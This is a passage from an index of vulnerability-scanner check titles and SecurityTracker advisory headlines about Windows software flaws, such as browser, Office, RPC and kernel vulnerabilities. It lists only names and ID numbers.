Multiple Vulnerabilities May-11 (Windows) - 02 [801884] Mozilla Products Multiple Vulnerabilities May-11 (Windows) - 01 [801883] Mozilla Products Multiple Vulnerabilities May-11 (Windows) [801878] Google Chrome multiple vulnerabilities - May11 (Windows) [801876] Microsoft Internet Explorer 'msxml.dll' Information Disclosure Vulnerability [801875] Mozilla Firefox Information Disclosure Vulnerability (Windows) [801872] Synergy Protocol Information Disclosure Vulnerability (Windows) [801871] Synergy Version Detection (Windows) [801855] Google Chrome multiple vulnerabilities - March 11 (Windows) [801847] Adobe Flash Player Multiple Vulnerabilities February-2011 (Windows) [801844] Adobe Reader and Acrobat Multiple Vulnerabilities February-2011 (Windows) [801831] Microsoft Internet Explorer Incorrect GUI Display Vulnerability [801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability [801825] Google Chrome multiple vulnerabilities - Jan11 (Windows) [801797] Python Multiple Vulnerabilities (Windows) [801795] Python Version Detection (Windows) [801792] Adobe Flash Player Multiple Vulnerabilities May-2011 (Windows) [801790] Perl Denial of Service Vulnerability (Windows) [801789] Google Chrome 'Sandbox' Remote Code Execution Vulnerability (Windows) [801788] Opera Browser 'SELECT' HTML Tag Remote Memory Corruption Vulnerability (Windows) [801786] Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows) [801785] Wireshark X.509if Dissector Denial of service vulnerability (Windows) [801784] VLC Media Player 'MP4_ReadBox_skcr()' Buffer Overflow Vulnerability (Windows) [801782] VLC Media Player 'Bookmark Creation' Buffer Overflow Vulnerability (Windows) [801779] RealNetworks RealPlayer 'OpenURLInDefaultBrowser()' Code Execution Vulnerability (Windows) [801776] Google Chrome 'GPU process' Multiple Code Execution Vulnerabilities (Windows) [801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows) [801772] Rsync Multiple Denial of Service Vulnerabilities (Windows) [801771] Perl Laundering Security Bypass Vulnerability (Windows) [801770] Google Picasa Insecure Library Loading Arbitrary Code Execution Vulnerability (Windows) [801769] Google Picasa Version Detection (Windows) [801768] RealNetworks RealPlayer IVR File Processing Buffer Overflow Vulnerability (Windows) [801763] Google Chrome Multiple Vulnerabilities - March 11(Windows) [801761] Wireshark Denial of Service Vulnerability March-11 (Windows) [801758] Wireshark Denial of Service Vulnerability March-11 (Windows) [801757] Wireshark Multiple Vulnerabilities March-11 (Windows) [801756] Wireshark Denial of Service Vulnerability - March-11 (Windows) [801755] Wireshark Multiple Vulnerabilities - March-11 (Windows) [801749] RealNetworks RealPlayer Buffer Overflow Vulnerability (Windows) [801747] Google Chrome Multiple Denial of Service Vulnerabilities - February 11(Windows) [801742] Wireshark Denial of Service Vulnerability (Windows) [801739] Google Chrome multiple vulnerabilities - February 11(Windows) [801728] Opera Browser Multiple Vulnerabilities Feb-11 (Windows) [801726] VLC Media Player 'CDG decoder' multiple buffer overflow vulnerabilities (Windows) [801725] Microsoft Products GDI Plus Remote Code Execution Vulnerabilities (954593) [801723] Vulnerability in Windows Services for UNIX Could Allow Elevation of Privilege (939778) [801721] Microsoft Active Directory Denial of Service Vulnerability (953235) [801715] Microsoft XML Core Services Remote Code Execution Vulnerability (936227) [801714] Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782) [801712] Vulnerability in RPC Could Allow Denial of Service (933729) [801709] Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078) [801708] Vulnerability in Windows Media File Format Could Allow Remote Code Execution [801707] Microsoft Internet Explorer mshtml.dll Remote Memory Corruption Vulnerability (942615) [801704] Microsoft Internet Information Services Privilege Elevation Vulnerability (942831) [801702] Microsoft Internet Explorer HTML Rendering Remote Memory Corruption Vulnerability (944533) [801680] Apple QuickTime Multiple vulnerabilities - Dec10 (Windows) [801678] Google Chrome multiple vulnerabilities - Dec10 (Windows) [801677] Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerabilities [801667] Google Chrome multiple vulnerabilities - Dec 10(Windows) [801637] Mozilla Firefox Security Bypass Vulnerability (Windows) [801629] Adobe Flash Player Multiple Vulnerabilities (Windows) [801606] Microsoft Internet Explorer 'mshtml.dll' Information Disclosure Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801595] Microsoft Office Excel Axis and Art Object Parsing Remote Code Execution Vulnerabilities [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [801581] MS Windows HID Functionality(Over USB) Code Execution Vulnerability [801561] VMware Products Tools Local Privilege Escalation Vulnerability (Windows) [801540] Google Chrome multiple vulnerabilities - November 10(Windows) [801530] Oracle Java SE Multiple Vulnerabilities (Windows) [801524] Adobe Acrobat and Reader Multiple Vulnerabilities -Oct10 (Windows) [801520] Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability [801506] RealNetworks RealPlayer Multiple Vulnerabilities (Windows) [801499] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801498] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801497] Mozilla Products Multiple Vulnerabilities dec-10 (Windows) [801495] Opera Browser Multiple Vulnerabilities December-10 (Windows) [801491] Microsoft 'hxvz.dll' ActiveX Control Memory Corruption Vulnerability (948881) [801489] Microsoft Office Graphics Filters Remote Code Execution Vulnerabilities (968095) [801488] Microsoft Internet Explorer Data Stream Handling Remote Code Execution Vulnerability (947864) [801485] Microsoft Pragmatic General Multicast (PGM) Denial of Service Vulnerability (950762) [801481] Microsoft Wireless LAN AutoConfig Service Remote Code Execution Vulnerability (970710) [801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565) [801477] Adobe Products Content Code Execution Vulnerability (Windows) [801475] Mozilla Firefox Unspecified Vulnerability Oct-10 (Windows) [801474] Opera Browser Multiple Vulnerabilities October-10 (Windows) [801473] Google Chrome multiple vulnerabilities - October 10(Windows) [801471] Mozilla Products Multiple Cross-site Scripting Vulnerabilities (Windows) [801470] Mozilla Products Multiple Unspecified Vulnerabilities October-10(Windows) [801469] Mozilla Products Unspecified Vulnerability (Windows) [801468] Mozilla Products Multiple Unspecified Vulnerabilities (Windows) [801467] Mozilla Products Multiple Vulnerabilities October-10 (Windows) [801465] Adobe Flash Player Untrusted search path vulnerability (windows) [801460] Google Chrome multiple unspecified vulnerabilities - October 10(Windows) [801452] Mozilla Products 'SJOW' Arbitrary Code Execution Vulnerability (Windows) [801451] Mozilla Products 'SJOW' Multiple Vulnerabilities (Windows) [801450] Mozilla Products Multiple Vulnerabilities sep-10 (Windows) [801447] Google Chrome multiple vulnerabilities (Windows) Sep10 [801429] VLC Media Player Meta-Information Denial of Service Vulnerability (Windows) [801423] Novell iPrint Client Multiple Security Vulnerabilities (Windows) [801399] MS Windows Insecure Library Loading Remote Code Execution Vulnerabilities (2269637) [801386] Mozilla Products Multiple Vulnerabilitie july-10 (Windows) [801385] Mozilla Products Multiple Vulnerabilities jul-10 (Windows) [801365] Adobe Acrobat and Reader Multiple Vulnerabilities -July10 (Windows) [801358] MS Windows Help and Support Center Remote Code Execution Vulnerability [801349] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability (June-10) [801348] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability -june 10 [801347] Mozilla Firefox 'IFRAME' Denial Of Service vulnerability (Windows) [801345] Microsoft .NET 'ASP.NET' Cross-Site Scripting vulnerability [801344] Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability [801342] Microsoft ASP.NET Cross-Site Scripting vulnerability [801331] Opera Browser 'document.write()' Code execution Vulnerability (Windows) [801330] Microsoft Internet Explorer Cross Site Data Leakage Vulnerability [801329] Google Chrome Cross Site Data Leakage Vulnerability (Windows) [801319] VMware Products Multiple Vulnerabilities (Windows) [801302] Skype Extras Manager Unspecified Vulnerability (Windows) [801301] Skype Version Detection (Windows) [801257] Opera Browser Multiple Vulnerabilities August-10 (Windows) [801216] Opera 'IFRAME' Denial Of Service vulnerability (Windows) [801109] Microsoft IE CA SSL Certificate Security Bypass Vulnerability - Oct09 [801034] Wireshark 'DCERPC/NT' Dissector DOS Vulnerability - Nov09 (Win) [801000] Visualization Library Multiple Unspecified Vulnerabilities (Windows) [800999] Visualization Library Version Detection (Windows) [800968] Microsoft SharePoint Team Services Information Disclosure Vulnerability [800967] Perl UTF-8 Regular Expression Processing DoS Vulnerability (Windows) [800966] Perl Version Detection (Windows) [800910] Microsoft Internet Explorer Buffer Overflow Vulnerability - Jul09 [800902] Microsoft Internet Explorer XSS Vulnerability - July09 [800872] Microsoft Internet Explorer 'li' Element DoS Vulnerability - Sep09 [800863] Microsoft Internet Explorer XML Document DoS Vulnerability - Aug09 [800861] Microsoft Internet Explorer 'findText()' Unicode Parsing DoS Vulnerability [800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability [800829] Microsoft Video ActiveX Control 'msvidctl.dll' BOF Vulnerability [800770] Google Chrome Multiple Vulnerabilities Windows - May10 [800761] HP System Management Homepage Unspecified Vulnerability (Windows) [800755] Mozilla Products Firebug Code Execution Vulnerability (Windows) [800753] Mozilla Products Multiple Vulnerabilitie Apr-10 (Windows) [800752] Mozilla Products Multiple Code Execution vulnerabilities (Windows [800751] Mozilla Products 'nsTreeSelection' Denial of Service vulnerability (Windows) [800750] Mozilla Products Denial of Service Vulnerability (Windows) [800742] Microsoft Internet Explorer Unspecified vulnerability [800700] Microsoft GDIPlus PNG Infinite Loop Vulnerability [800669] Microsoft Internet Explorer Denial Of Service Vulnerability - July09 [800505] Microsoft HTML Help Workshop buffer overflow vulnerability [800499] Oracle Java SE Multiple Vulnerabilities (Windows) [800481] Microsoft SharePoint Cross Site Scripting Vulnerability [800461] Microsoft Internet Explorer Information Disclosure Vulnerability (980088) [800435] Google SketchUp Multiple Vulnerabilities (Windows) [800429] Microsoft Internet Explorer Remote Code Execution Vulnerability (979352) [800382] Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability (967340) [800347] Microsoft Internet Explorer Clickjacking Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [800337] Microsoft Internet Explorer NULL Pointer DoS Vulnerability [800267] Microsoft GDIPlus Library File Integer Overflow Vulnerability [800247] Wireshark Multiple Vulnerabilities Feb-09 (Windows) [800218] Microsoft Money 'prtstb06.dll' Denial of Service vulnerability [800217] Microsoft Money Version Detection [800215] PGP Desktop Version Detection (Windows) [800209] Microsoft Internet Explorer Version Detection (Win) [800208] Microsoft Internet Explorer Anti-XSS Filter Vulnerabilities [800192] HP SMH Insight Diagnostics Cross Site Scripting Vulnerability - Windows [800120] Google Chrome Version Detection (Windows) [800106] Adobe Reader/Acrobat JavaScript Method Handling Vulnerability (Windows) [800083] Microsoft Outlook Express Malformed MIME Message DoS Vulnerability [800082] Microsoft SQL Server sp_replwritetovarbin() BOF Vulnerability [800040] Wireshark Multiple Vulnerabilities - Oct08 (Windows) [800016] Mozilla SeaMonkey Version Detection (Windows) [800000] VMWare products version detection (Windows) [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [101100] Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution (973908) [101018] Windows SharePoint Services detection [101017] Microsoft MS03-018 security check [101016] Microsoft MS03-022 security check [101015] Microsoft MS03-034 security check [101014] Microsoft MS00-078 security check [101012] Microsoft MS03-051 security check [101010] Microsoft Security Bulletin MS05-004 [101009] Microsoft Security Bulletin MS06-033 [101007] Microsoft dotNET version grabber [101006] Microsoft Security Bulletin MS06-056 [101005] Microsoft Security Bulletin MS07-040 [101004] Microsoft MS04-017 security check [101003] Microsoft MS00-058 security check [101000] Microsoft MS00-060 security check [100952] Microsoft IIS FTPd NLST stack overflow [100950] Microsoft DNS server internal hostname disclosure detection [100798] MailEnable 'MESMTRPC.exe' SMTP Service Multiple Remote Denial of Service Vulnerabilities [100608] Windows NT NNTP Component Buffer Overflow [100607] Microsoft SMTP Service and Exchange Routing Engine Buffer Overflow Vulnerability [100529] PHP xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities [100357] Cisco VPN Client for Windows 'StartServiceCtrlDispatche' Local Denial of Service Vulnerability [100062] Microsoft Remote Desktop Protocol Detection [96204] Get Windows Eventlog Entries over WMI [90020] Windows vulnerability in DNS Client Could Allow Spoofing (945553) [80036] rpc.ypupdated remote execution [80034] irix rpc.passwd overflow [80029] rpc.nisd overflow [80007] Microsoft MS00-06 security check [65954] SLES10: Security update for librpcsecgss [64922] Debian Security Advisory DSA 1890-1 (wxwindows2.4 wxwidgets2.6 wxwidgets2.8) [58670] Debian Security Advisory DSA 1387-1 (librpcsecgss) [58588] Debian Security Advisory DSA 1368-1 (librpcsecgss) [55127] Gentoo Security Advisory GLSA 200508-13 (pear-xml_rpc phpxmlrpc) [55050] FreeBSD Ports: pear-XML_RPC [54977] Gentoo Security Advisory GLSA 200507-01 (pear-xml_rpc phpxmlrpc) [54206] FreeBSD Ports: pear-XML_RPC [53990] FreeBSD Ports: pear-XML_RPC [53957] Slackware Advisory SSA:2005-111-02 Python SimpleXMLRPCServer module [53601] Debian Security Advisory DSA 312-1 (kernel-patch-2.4.18-powerpc) [53163] Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus) [53114] Debian Security Advisory DSA 417-1 (kernel-patch-2.4.18-powerpc, kernel-image-2.4.18-1-alpha) [20377] Windows Server Update Services detection [15467] Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350) [14229] HTTP Directory Traversal (Windows) [13752] Denial of Service (DoS) in Microsoft SMS Client [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [11887] Buffer Overflow in Windows Troubleshooter ActiveX Control (826232) [11443] Microsoft IIS UNC Mapped Virtual Host Vulnerability [11433] Microsoft ISA Server DNS - Denial Of Service (MS03-009) [11429] Windows Messenger is installed [11418] Sun rpc.cmsd overflow [11340] SSH Secure-RPC Weak Encrypted Authentication [11217] Microsoft's SQL Version Query [11177] Flaw in Microsoft VM Could Allow Code Execution (810030) [11160] Windows Administrator NULL FTP password [11159] MS RPC Services null pointer reference DoS [11147] Unchecked Buffer in Windows Help(Q323255) [11146] Microsoft RDP flaws could allow sniffing and DOS(Q324380) [11111] rpcinfo -p [11091] Windows Network Manager Privilege Elevation (Q326886) [11067] Microsoft's SQL Hello Overflow [10964] Windows Debugger flaw can Lead to Elevated Privileges (Q320206) [10930] HTTP Windows 98 MS/DOS device names DOS [10929] FTP Windows 98 MS/DOS device names DOS [10862] Microsoft's SQL Server Brute Force [10763] Detect the HTTP RPC endpoint mapper [10755] Microsoft Exchange Public Folders Information Leak [10680] Test Microsoft IIS Source Fragment Disclosure [10674] Microsoft's SQL UDP Info Query [10673] Microsoft's SQL Blank Password [10491] ASP/ASA source using Microsoft Translate f: bug [10144] Microsoft SQL TCP/IP listener is running [2497] IBM Lotus Domino Notes RPC Authentication Processing Denial of Service Vulnerability SecurityTracker - https://www.securitytracker.com: [1025937] Microsoft Windows DHCPv6 Processing Flaw Lets Remote Denial of Service to RPC Services [1024441] Microsoft Windows RPC Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1017910] Microsoft Windows DNS Service RPC Stack Overflow Lets Remote Users Execute Arbitrary Code [1015233] Microsoft Windows RPC Service May Let Remote Users Deny Service [1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users [1009762] Microsoft Windows COM Internet Services and RPC over HTTP Can Be Crashed By Remote Users [1007922] Microsoft Windows RPC Multi-threaded Race Condition Lets Remote Users Crash the Service or Execute Arbitrary Code [1007670] Microsoft Windows Remote Procedure Call (RPC) DCOM Activation Buffer Overflows Let Remote Users Execute Arbitrary Code [1007212] Microsoft Windows Remote Procedure Call (RPC) Service Buffer Overflow in Processing DCOM Requests Allows Remote Code Execution [1005455] Microsoft Windows Remote Procedure Call (RPC) Service Null Pointer Dereference Allows Remote Users to Crash the Service [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1028906] Windows RPC Bug Lets Local Users Gain Elevated Privileges [1028903] Microsoft Windows Unicode Scripts Processor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1028754] Microsoft Windows Defender Pathname Bug Lets Local Users Gain Elevated Privileges [1028748] Microsoft Windows GDI+ TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1027934] Microsoft Windows Includes Some Invalid TURKTRUST Certificates [1027389] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027385] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027384] Microsoft Host Integration Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027383] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027381] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027380] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1027114] Microsoft Windows Includes Some Invalid Certificates [1027043] Microsoft Windows Partition Manager Memory Allocation Error Lets Local Users Gain Elevated Privileges [1026905] Microsoft BizTalk Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026904] Microsoft Visual Basic Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026903] Microsoft Visual FoxPro Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026902] Microsoft Commerce Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026900] Microsoft Office Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026899] Microsoft SQL Server Windows Common Controls (MSCOMCTL.OCX) Bug Lets Remote Users Execute Arbitrary Code [1026685] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026497] Microsoft Windows ClickOnce Feature Lets Remote Users Execute Arbitrary Code [1026271] Microsoft Windows TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1026167] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1026103] Microsoft Windows SSL/TLS Protocol Flaw Lets Remote Users Decryption Sessions [1026041] Microsoft Windows Components DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026037] Microsoft Windows Internet Name Service (WINS) Input Validation Flaw in ECommEndDlg() Lets Local Users Gain Elevated Privileges [1025760] Microsoft Windows Bluetooth Stack Memory Access Error Lets Remote Users Execute Arbitrary Code [1025643] Microsoft Windows Ancillary Function Driver Lets Local Users Gain Elevated Privileges [1025634] Microsoft Windows OLE Automation Underflow Lets Remote Users Execute Arbitrary Code [1025512] Microsoft Windows Internet Name Service Socket Send Exception Handling Bug Lets Remote Users Execute Arbitrary Code [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025312] Microsoft Windows Kernel Bug in AFD.sys Lets Local Users Deny Service [1025248] Microsoft Windows Includes Some Invalid Comodo Certificates [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024879] Microsoft Windows Internet Connection Signup Wizard May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024877] Microsoft Windows May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024874] Microsoft Windows Task Scheduler Lets Local Users Gain Elevated Privileges [1024312] Microsoft Windows Tracing Feature for Services Lets Local Users Gain Elevated Privileges [1024216] Microsoft Windows Shell LNK Shortcut Processing Flaw Lets Users Execute Arbitrary Code [1023571] Microsoft Windows Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023566] Microsoft Windows Kerberos Ticket-Granting-Ticket Processing Flaw Lets Remote Authenticated Users Deny Service [1023495] Microsoft Internet Explorer and Windows OS Shell Handler URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1022710] Microsoft Windows Internet Name Service (WINS) Buffer Overflows Let Remote Users Execute Arbitrary Code [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022330] Microsoft Windows Bug in SETDESKWALLPAPER and GETDESKWALLPAPER Calls Let Local Users Deny Service [1022047] Microsoft Windows SearchPath Function May Let Remote Users Execute Arbitrary Code [1022044] Microsoft Windows Privilege Separation and Access Control Bugs Let Local Users Gain Elevated Privileges [1021629] Microsoft Windows Guidelines for Disabling AutoRun are Ineffective and May Permit Code Execution [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020678] Microsoft Windows IPSec Policy May Not Be Enforced in Certain Cases [1020677] Microsoft Windows Event System Bugs Let Remote Authenticated Users Execute Arbitrary Code [1020446] Microsoft Windows AutoRun Bug May Let Users Execute Arbitrary Code [1020006] Microsoft Windows XP 'i2omgmt.sys' Input Validation Flaw Lets Local Users Gain Elevated Privileges [1019165] Microsoft Windows LSASS Lets Local Users Gain Elevated Privileges [1018942] Microsoft Windows DNS Service Insufficent Entropy Lets Remote Users Spoof the DNS Service [1018831] Microsoft Windows ShellExecute() URI Handler Bug Lets Remote Users Execute Arbitrary Commands [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1017901] Microsoft Windows Help File Heap Overflow Lets Remote Users Execute Arbitrary Code [1017827] Microsoft Windows Animated Cursor Bug Lets Remote Users Execute Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP 